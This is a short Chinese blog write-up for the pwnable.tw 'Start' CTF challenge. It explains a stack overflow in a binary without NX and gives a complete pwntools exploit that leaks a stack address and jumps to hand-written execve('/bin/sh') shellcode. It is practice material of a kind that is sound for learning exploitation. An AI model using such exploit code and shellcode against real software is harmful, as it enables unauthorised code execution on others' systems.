美文网首页
[pwnable.tw]-Start

[pwnable.tw]-Start

作者: 2mpossible | 来源:发表于2018-11-07 00:57 被阅读0次
  • 程序很简单,直接用汇编int 80实现的读写退出,没开NX保护,然后有个栈溢出漏洞,先泄漏栈地址,然后往栈里写shellcode,再return to shellcode即可
  • 这里我尝试自己写了个简单的shellcode

exp:

from pwn import *
context.log_level = 'debug'
p = process('./start')


p.recvuntil(' CTF:')
#gdb.attach(p)
p.send('a'*0x14 + p32(0x08048087))

leak_stack = u32(p.recv(4))
log.success("leak stack add: 0x%x"%leak_stack)

shellcode = asm(
            '''
            sub esp,0x60
            push 0x0068732f
            push 0x6e69622f
            mov ebx, esp
            mov eax, 0xb
            xor cl, cl
            xor dl, dl
            int 0x80
            '''
                )

p.send('a'*0x14 + p32(leak_stack+0x14) + shellcode)

p.interactive()

相关文章

  • [pwnable.tw]-Start

    程序很简单,直接用汇编int 80实现的读写退出,没开NX保护,然后有个栈溢出漏洞,先泄漏栈地址,然后往栈里写sh...

  • Pwnable.tw Start

    参考了这篇writeup http://dogewatch.github.io/2017/04/10/pwnabl...

  • Start ---- pwnable.tw

    链接见标题。 这个题其实不需要IDA这些工具。 首先我们先checksec start: 没有防护机制,想想也是,...

  • pwnable.tw之start

    最近开始在网上找一些pwn题练手,由于pwn的环境一般来说是要比web的环境要难搭建的,所以要找到一些好的题目还是...

  • pwnable.tw start wp

    0x01分析 checksec ida 先调用int 80h的4号程序:sys_write再调用int 80h的3...

  • 【pwnable.tw 系列】start

    概述:本题是pwn的入门级题目,几乎把所有利用的难度都降到最低,应该只是用来让入门者大致了解pwn题的玩法。 1、...

  • pwnable.tw 题解一 Start orw calc d

    0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...

  • house of orange总结

    例题pwnable.tw BookWriter 原理可见https://github.com/shellphish...

  • 2019-12-05 - 草稿

    Start。Start。Start。 Start。Start。Start。 Hello,everyone ! No...

  • Pwnable.tw hacknote

    一道适合入门的堆利用题目 需要事先了解 malloc 相关的堆分配机制(fastbin,normal bin等) ...

网友评论

      本文标题:[pwnable.tw]-Start

      本文链接:https://www.haomeiwen.com/subject/maxmxqtx.html